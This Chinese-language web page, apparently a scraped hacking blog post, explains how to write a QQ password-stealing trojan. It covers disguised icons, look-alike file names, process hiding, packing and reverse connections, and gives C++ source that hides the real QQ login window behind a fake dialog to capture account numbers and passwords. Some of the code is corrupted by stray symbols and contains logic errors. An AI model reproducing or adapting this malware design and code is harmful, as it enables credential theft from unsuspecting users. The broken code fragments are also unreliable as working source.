盗号木马程序_怎样编写盗QQ木马程序

hacker|
224

如何编制木马

木马是啥东西?木马是一种能蒙过用户眼睛的病毒

编制方法是用VB或JAVA等编程工具。其大致思路如下:

一,图标上给用户以假象,让用户觉得不是程序,而是图片等文件,用户一点,嘿嘿!

二,不能在任务栏上留痕迹,在编程的时候,声明一下就可以了

三,名字起好一点,要么吸引人,比如“祝福”要么跟其他的文件类似,让人难以分辨比如“EXPL0RE”其中中间是数字零

四,要么不要给程序以操作界面,要么操作界面跟另一个东西类似。比如一个盗QQ的木马,中了之后,木马把原QQ登陆程序删掉,替换成另一个同名程序,这个程序操作界面跟原QQ一模一样,不同的是,QQ登陆的数据发往腾讯公司,这个程序把数据发到指定的邮箱或服务器

五,有的木马运行时是采用监听策略,盗取密码

要写一个简单的木马需要掌握哪些知识?

1.良好的编程知识(C++,JAVA,delphi,VB也凑合,实在不行用易语言) 至少会一样吧

2.确定木马的功能.木马有很多种,示功能而定,比如盗号木马,远程控制木马(这类木马一般功能比较完美),网页木马(拿来黑网站用的),还有一些比如实现某一特殊功能的,.如DDOS攻击木马,控制类木马则还要编写主控端

3确定木马的连接方式,主动式和被动式(就是网上说的主动连接和反向连接)主动连接基本已经被淘汰了,

4,木马的隐藏,这是最大的问题也是最难的问题,如果你的木马不能隐藏那么也没就没有生存的余地.不仅仅是隐藏木马文件,进程,(这一般通过加载为系统服务或者通过DLL隐藏进程还有一些木马用驱动隐藏)还要隐藏木马的通信方式,不被防火墙阻止(如HTTP隧道)这里面的学问很多

5加壳,就是加密木马,还可以减少木马体积.

这里主要说下木马主体的编写方式

以最简单的盗QQ木马(阿拉QQ大盗)为例.

1.中马之后,先替换掉TXPlatform.exe(QQ密码保护文件)后台监视系统.如发现QQ.exe,则监视QQ两个文本框的text值,并将输入的信息保存,生成邮件.后台发送到种马人.这个很简单,难的再于如何替换TXPlatform.exe并且不被QQ.exe发现.还有就是如何才能取得QQ文本框中的两个值.

附送一份N年前的QQ盗号木马源程...仅做研究,这个是N年前的,用的不是我上面提到的方法,用的是把QQ的输入框替换为假的,然后密码自然而然的被木马给知道了.

BOOL processIdToName(LPTSTR lpszProcessName, DWORD PID)

{

HANDLE hSnapshot = C★reateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

PROCESSENTRY32 pe;

pe.dwSize = sizeof(PROCESSENTRY32);

if (!Process32First(hSnapshot, pe)) {

return FALSE;

}

while (Process32Next(hSnapshot, pe)) {

if (pe.th32ProcessID == PID) {

strcpy(lpszProcessName, pe.szExeFile);

return true;

}

}

return FALSE;

}

//查找QQ登录窗口

void QQFind()

{

HWND hWnd1 = NULL, qqID_hWnd = NULL, qqPass_hWnd = NULL;

HWND ButtonLogin = NULL, ButtonCancel = NULL;

c★har sTitle[255];

CString ss;

DWORD QQPID;

int LoginID;

BOOL find = FALSE;

do

{

//获得当前激活窗口的句柄

g_hWnd = GetForegroundWindow();

GetWindowThreadProcessId(g_hWnd, QQPID);

//根据PID获得进程名

processIdToName(sTitle, QQPID);

ss = sTitle;

ss.MakeLower();

//判断是否QQ

if(ss != "qq.exe")

{

Sleep(100);

continue;

}

//获得标题文字,判断是否登陆对话框

SendMessage(g_hWnd,WM_GETTEXT,255,(LPARAM)sTitle);

ss = sTitle;

int n = ss.Find("QQ", 0);

int m = ss.Find("登录", 0);

if(n = 0 || m = 0)

{

//查找QQ登陆按钮的句柄

ButtonLogin = FindWindowEx(g_hWnd, ButtonLogin, "Button", "登录");

LoginID = GetDlgCtrlID(ButtonLogin);

ButtonLogin = FindWindowEx(g_hWnd, ButtonLogin, "Button", "登录");

LoginID = GetDlgCtrlID(ButtonLogin);

//获得QQ登陆按钮窗口位置

GetWindowRect(ButtonLogin, g_qqLogin);

//查找QQ取消按钮的句柄

ButtonCancel = FindWindowEx(g_hWnd, NULL, "Button", "取消");

//获得QQ取消按钮窗口位置

GetWindowRect(ButtonCancel, g_qqCancel);

//查找QQ密码输入框的句柄

hWnd1 = FindWindowEx(g_hWnd, NULL, "#32770", NULL);

if(hWnd1 != NULL)

{

qqPass_hWnd = FindWindowEx(hWnd1, qqPass_hWnd, "Edit", NULL);

//获得QQ密码输入框窗口位置

GetWindowRect(qqPass_hWnd, g_qqPassRt);

}

//查找QQ号码输入框的句柄

hWnd1 = FindWindowEx(g_hWnd, NULL, "ComboBox", NULL);

if(hWnd1 != NULL)

{

qqID_hWnd = FindWindowEx(hWnd1, qqID_hWnd, "Edit", NULL);

//获得QQ号码输入框窗口位置

GetWindowRect(qqID_hWnd, g_qqIDRt);

//获得当前默认QQ号码

SendMessage(qqID_hWnd,WM_GETTEXT, 255,(LPARAM)qqid);

}

//等待QQ窗口完全出现后抓取整个屏幕

Sleep(100);

g_DlgRt.left = 0;

g_DlgRt.top = 0;

g_DlgRt.right = m_xScreen;

g_DlgRt.bottom = m_yScreen;

g_pBitmap = CopyScreenToBitmap(g_DlgRt);

//设置QQ窗口为不可见

ShowWindow(g_hWnd, SW_HIDE);

//弹出我们创建的伪造对话框

HINSTANCE hInstance = GetModuleHandle(NULL);

DialogBoxParam(hInstance, (LPCTSTR)IDD_WIN847, 0, (DLGPROC)win847, 0);

//设置QQ窗口为可见

ShowWindow(g_hWnd, SW_SHOW);

//把QQ号码和密码填到真正的QQ登录窗口上,并模拟单击登陆按钮

SendMessage(qqID_hWnd, WM_SETTEXT, 0, (LPARAM)qqid);

SendMessage(qqPass_hWnd, WM_SETTEXT, 0, (LPARAM)qqpass);

SendMessage(ButtonLogin, BM_CLICK, 0, 0);

D★eleteObject(g_pBitmap);

//设置标志退出循环

find = true;

}

}

while(find == FALSE);

}

C++关于写一个盗Q号的木马,这个会很难吗?(只是学习用。。)

盗号木马的原理是hook程序,它监视hook事件,一旦触发就立即返回,在你的线程中执行你的程序,执行完后释放让其他程序继续执行这个消息。

如QQ,在输入账号密码后点击登录按钮,那就是一个事件,hook程序截取这一事件,在QQ向服务器发送账号密码前中断,你的程序提取出账号密码,发送给你后再让QQ发送给服务器。大概过程是这样的,不过这个要很高的技术,因为QQ在那个账号密码编辑框设置了很多保护,一般的hook程序是搞不定它的。

0条大神的评论

发表评论